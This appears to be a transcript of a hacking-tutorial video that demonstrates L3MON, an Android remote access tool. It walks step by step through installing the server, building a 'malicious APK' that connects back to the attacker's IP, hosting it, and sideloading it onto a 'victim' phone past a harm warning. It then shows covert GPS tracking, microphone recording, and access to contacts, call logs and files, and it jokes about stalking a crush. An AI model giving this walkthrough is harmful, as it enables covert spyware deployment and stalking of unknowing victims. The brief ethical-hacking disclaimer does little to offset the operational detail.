So going back to the web panel, right here, we got it. We see the IP, the device name, it's currently online. We click on manage, and we can do all sorts of stuff. GPS, we see the current GPS location. Microphone, we can literally record their conversations. Yes, that's true. You can track your crush's location without her even knowing. Now you can stalk her every move. No, I'm joking, that's illegal, you virgin. Today I'm showcasing a tool called Lemon, made by EFXTV, which is an Android remote control framework that works with a server and a web panel. So when our victim runs our malicious APK file generated by the tool, it connects back to the server, and from the panel, we can view stuff like a GPS location and control different stuff remotely. By the way, if you are a beginner in ethical hacking and want some hands-on practice, I'm soon launching a free hacking lab right here on my Discord. With one simple command, you'll get your isolated Linux container ready for you to hack. And you don't have to be worried about being stuck. You'll get walkthroughs, hints, explanations, and also help from other Discord members. Before we begin, just remember hacking is illegal and should never be done to harm anyone. In front of me I have Kali Linux, and I have the Lemon GitHub page pulled up. So first what we do is we git clone into a repository by going into code and then copying the web URL. Then we open our terminal and we type git clone, paste in the web URL. Now we're cloning to a repository. After that's done, we go inside the directory by typing cd lemon and we list the files. Here are all our files. But first, let's check out the features. Lemon features, GPS logging, microphone recording, view contacts, and messages. We can also check that later. First, let's install it. Installation, install JRE8, Java 1.8.0. I already have it, but if you don't, here's for Linux, just copy these, paste it, and you'll be good to go. Here for Termux, and so on and so forth. So let me check if I have it. I type Java-version, and right here, Java version 1.8.0. I'm good to go. Then next, install Node.js. If you don't have it, install Node.js. I already have it. Then we install the Node.js dependencies by typing npm install. That's it. After that's done, we go back to the site, and next we have to install pm2. I already have it, but if you don't, follow the instructions. Super easy. Npm install pm2-g. Next, in the instructed folder, run these commands: npm install. We already did that. Next, we need to run the script by doing npm2 start index.js. So npm2 start index.js, and we can also give the pm2 a name. So we do -- name, and then we give it ml3 mon. I ran it successfully. We can see here ID 0, name lemon, mode fork, and status online. Next, we need to run lemon on startup. pm2, I don't want it on startup. I don't need it. I can just leave that. So next, we list the files again. So next, we need to change our credentials. And right here, it says, first we need to stop pm2 index. So pm2 stop. I gave it a name. I gave it lemon name. So I'm going to type lemon, not index. So pm2 stop lemon. And now ID 0 lemon stopped. Now we change the credential in the main db.json. So nano main db.json. We go right here. Username admin and password is blank. Now we need to set a password. I'm going to keep the username admin, doesn't matter. Here, I'm going to type password, and you can also put an MD5 hash. It also accepts MD5 hashes, but I'm not going to complicate it. I'm just going to put a password. To start it again, we do pm2 start lemon, the name of the pm2 we gave. And also, if you're having problems or something, you can do restart, which I'm going to do as well. Right here, ID 0 lemon online status. So next up, scrolling down, here's the last step. In your browser, navigate to HTTP localhost port 22533. So we copy this, paste in our browser. And right here is the admin panel, the web panel I was talking about earlier. Now we put our credential we set. I set my admin for username and password for password. Login. And right here, I already gave it a test first, just to try it out if it works. The next, first we head up to APK Builder to build our malicious APK file I was talking about at the start. So here, HTTP, we have to give our IP or public URL. If you want to use a custom URL, you can, doesn't matter. For me, I'm going to use my IP, so it's easier. So I'm going to go up in the terminal to see my IP first. If config, and right here I have my IP, so I'm going to go ahead and copy this, paste it in, and then build. After it's done downloading, we go ahead and click on the download button, and then right here downloads lemon.apk. So next up, we open a terminal. Let me just make this bigger and let's clear this up because it looks messy. Now we need to copy our APK file, malicious APK file, to our Apache 2 server so we can call it from our victim's phone. How we do that? We type sudo cp for copy, then you type the destination of the file you just made, -home, who am I tang, downloads, and then lemon, you can just press tab to type it out for you. Then you type the destination you wanted to go to var www.html. This is the location for your Apache 2 server. You just press enter. Now it's copied. Now to start the Apache 2 server, we do sudo systemctl start Apache 2. Now it's running. We can check that by doing sudo systemctl status, and here we can see active and running. So now on our victim's phone, we have to call up the malicious APK file we just generated, and we do it by going into our Apache 2 server. So we type out our IP. My IP is 192.168.178.65, followed by /, and then the APK file name, l3mon.apk. We hit enter, it downloads, so we hit download, and then we open it. Install. App may be harmful, more details, install anyway. And done. That's all we had to do. We click done. Here it looks like nothing happened. So going back to the web panel, right here, we got it. We see the IP, the device name, it's currently online. We click on manage, and we can do all sorts of stuff. GPS, we see the current GPS location. Microphone, we can literally record their conversations. Contacts, call logs. Let's go, for example, File Explorer. Let's go to home, and right here we get all of their files, all the Pornhub, everything they installed, we see it here.